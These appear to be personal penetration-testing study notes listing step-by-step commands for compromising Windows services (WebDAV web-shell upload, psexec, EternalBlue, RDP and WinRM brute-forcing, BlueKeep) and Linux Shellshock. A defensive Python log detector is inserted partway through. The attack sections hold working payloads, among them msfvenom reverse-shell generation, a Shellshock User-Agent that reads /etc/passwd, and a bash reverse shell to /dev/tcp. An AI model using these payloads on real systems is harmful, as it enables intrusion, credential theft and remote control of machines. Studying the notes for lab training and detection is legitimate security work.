- WINDOWS
-Microsoft IIS + WebDAV: (port 80/443)
IIS can execute .asp, .aspx, .config and .php files
davtest (used to scan, authenticate to and exploit a WebDAV server)
davtest -url http://IPobj/webdav (without creds)
davtest -auth user:pass -url http://IPobj/webdav (this tells you the types of files we can upload and execute)
cadaver (upload and download files; display, edit, move and copy files; create and erase collections; change the owner and lock resources on WebDAV servers)
cadaver --help
cadaver http://IPobj/webdav (and input the credentials)
in other terminal: ls -al /usr/share/webshells (asp in this case)
then in cadaver: put /usr/share/webshells/asp/webshell.asp (configure the shell first if necessary)
Go back to the web page and try to execute the web shell by browsing to its path.
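From the defender's side, the upload-then-execute sequence above leaves a clear trace in the IIS W3C logs: a PUT (or MOVE/COPY) of an executable extension under the WebDAV root, followed by a GET or POST to that same path. The following is an added example, not part of the original notes or of davtest/cadaver; the log lines are constructed, and the field layout assumes the default IIS W3C `#Fields:` header shown in the sample.

```python
import os
from typing import Iterator

# Constructed sample of IIS W3C log lines (not from any real server).
# IIS writes spaces inside the User-Agent as '+', so each line splits cleanly.
SAMPLE_IIS_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2024-01-10 10:00:01 10.0.0.5 GET /index.html - 80 - 10.0.0.20 Mozilla/5.0 200
2024-01-10 10:00:07 10.0.0.5 OPTIONS /webdav/ - 80 - 10.0.0.20 DAV-Test 200
2024-01-10 10:00:09 10.0.0.5 PUT /webdav/webshell.asp - 80 bob 10.0.0.20 cadaver/0.23.3 201
2024-01-10 10:00:11 10.0.0.5 PUT /webdav/report.txt - 80 bob 10.0.0.20 cadaver/0.23.3 201
2024-01-10 10:00:15 10.0.0.5 GET /webdav/webshell.asp cmd=whoami 80 - 10.0.0.20 Mozilla/5.0 200
2024-01-10 10:00:20 10.0.0.5 MOVE /webdav/notes.txt - 80 bob 10.0.0.20 cadaver/0.23.3 201
"""

# Extensions IIS will hand to a script engine; matches the list in the notes
# plus two common handler extensions (assumption: adjust to your handler mappings).
EXECUTABLE_EXTS = {".asp", ".aspx", ".config", ".php", ".ashx", ".asmx"}
# WebDAV methods that create or rename content on the server.
WRITE_METHODS = {"PUT", "MOVE", "COPY"}


def parse_iis_log(text: str) -> Iterator[dict]:
    """Yield one dict per request line, keyed by the names in the #Fields: header."""
    fields: list[str] = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed or truncated line; skip rather than misalign fields
        yield dict(zip(fields, values))


def find_webdav_webshell_activity(text: str, dav_root: str = "/webdav/") -> list[str]:
    """Return alert strings for executable uploads under dav_root and later requests to them."""
    alerts: list[str] = []
    uploaded: set[str] = set()
    for rec in parse_iis_log(text):
        method = rec["cs-method"].upper()
        uri = rec["cs-uri-stem"].lower()
        ext = os.path.splitext(uri)[1]
        when = f"{rec['date']} {rec['time']} {rec['c-ip']}"
        if uri.startswith(dav_root) and method in WRITE_METHODS and ext in EXECUTABLE_EXTS:
            uploaded.add(uri)
            alerts.append(f"{when} {method} {uri} -> executable content written via WebDAV "
                          f"(user {rec['cs-username']}, status {rec['sc-status']})")
        elif method in {"GET", "POST"} and uri in uploaded:
            alerts.append(f"{when} {method} {uri} -> request to previously uploaded file "
                          f"(possible web shell execution)")
    return alerts


if __name__ == "__main__":
    for alert in find_webdav_webshell_activity(SAMPLE_IIS_LOG):
        print(alert)
```

The second rule (a request to a path that this same log showed being written) is what separates a real web shell from a noisy but harmless PUT; in production you would also want to alert on MOVE/COPY whose destination header is not logged, and on successful PUTs from any account that is not expected to write to the share.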
-Microsoft IIS + WebDAV METASPLOIT:
Method 1:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IPkali LPORT=x -f asp > shell.asp (reverse shell payload in asp)
then: cadaver http://IPobj/webdav, input credentials and upload the revshell with the put command
Open metasploit: service postgresql start && msfconsole -> use multi/handler -> set payload windows/meterpreter/reverse_tcp (configure it exactly as the payload we created with msfvenom) -> run. Then go to the web page, execute the uploaded payload and we get a reverse shell.
Method 2:
search iis upload -> use 1 -> show options & config it -> set path /webdav/metasploit.asp -> exploit
-EXPLOITING SMB WITH PSEXEC:
To use PsExec we need credentials (user & pass) or a hash if we haven't the pass.
use: psexec.py user@IPobj cmd.exe
For meterpreter:
search psexec -> use 10 (exploit/windows/smb/psexec) -> configure and run.
-ETERNALBLUE (Metasploit or python script from searchsploit). MS17-010 & CVE-2017-0144
Eternalblue is easy bruh.
-EXPLOITING RDP: (normally 3389 TCP)
Requires an account of the victim PC (username & password)
metasploit rdp_scanner (to see the version of RDP)
then brute-force (with hydra, for example); getting an account with privileges is better.
xfreerdp /u:user /p:password /v:IPobj:RDPport (to connect via RDP to the victim machine)
-BLUEKEEP: CVE-2019-0708:
METASPLOIT: search bluekeep (use the auxiliar module to see if it's vulnerable)
then search bluekeep -> use 1 (only works for x64 bits targets) -> show options (config as needed) -> show targets (choose the right one)
-EXPLOITING WinRM: (5985 HTTP and 5986 HTTPS)
Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Remote administration protocol for Windows hosts.
Exploitation:
crackmapexec to see the help panel
crackmapexec winrm IPobj -u administrator -p /path/to/wordlist (to get credentials of a privileged user; Administrator always exists on Windows)
crackmapexec winrm IPobj -u administrator -p pass -x "whoami" (to try RCE)
evil-winrm(.rb) -u administrator -p 'passadmin' -i IPobj (to obtain a shell on the victim)
METASPLOIT:
search winrm_script_exec -> use 0 -> show options (and configure) -> set force_vbs true -> set username and password -> exploit (it may not work, try a few times)
- LINUX:
-SHELLSHOCK: (CVE-2014-6271)
The Shellshock vulnerability exists because old versions of bash, when importing a function definition from an environment variable, keep parsing past the function body and execute whatever follows this prefix: () { :;};
Apache web servers configured to run CGI scripts or sh scripts may be vulnerable (those scripts live in the /cgi-bin/ directory), because Apache copies request headers into environment variables for the script.
To exploit this vulnerability you have to find a script that is run through bash.
In the context of an Apache web server we could use any .cgi script stored there.
EXPLOITING SHELLSHOCK:
We connect to the web page through the browser.
In the source code we see this:
In a <script> tag we see that it executes a .cgi file; access the script through its URL.
Check if it's vulnerable with: nmap -sV IPobj --script=http-shellshock --script-args "http-shellshock.uri=/script.cgi"
MANUAL EXPLOITATION:
With Burp Suite intercept the page IPobj/script.cgi -> right click -> send to repeater -> change the User-Agent to: () { :;}; echo; echo; /bin/bash -c 'cat /etc/passwd' -> send; in the response we get the output of the executed command. THIS IS RCE, SO YOU CAN USE /usr/bin/whoami FOR EXAMPLE.
MANUAL REVERSE SHELL:
nc -nlvp port (on the local machine)
Go back to the Burp repeater and in User-Agent put this: () { :;}; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/IPkali/port 0>&1' (the port is the one netcat is listening on) and we obtain the reverse shell.
METASPLOIT:
search shellshock -> use 5 (exploit/multi/http/apache_mod_cgi_bash_env_exec) -> show options -> set targeturi script.cgi -> exploit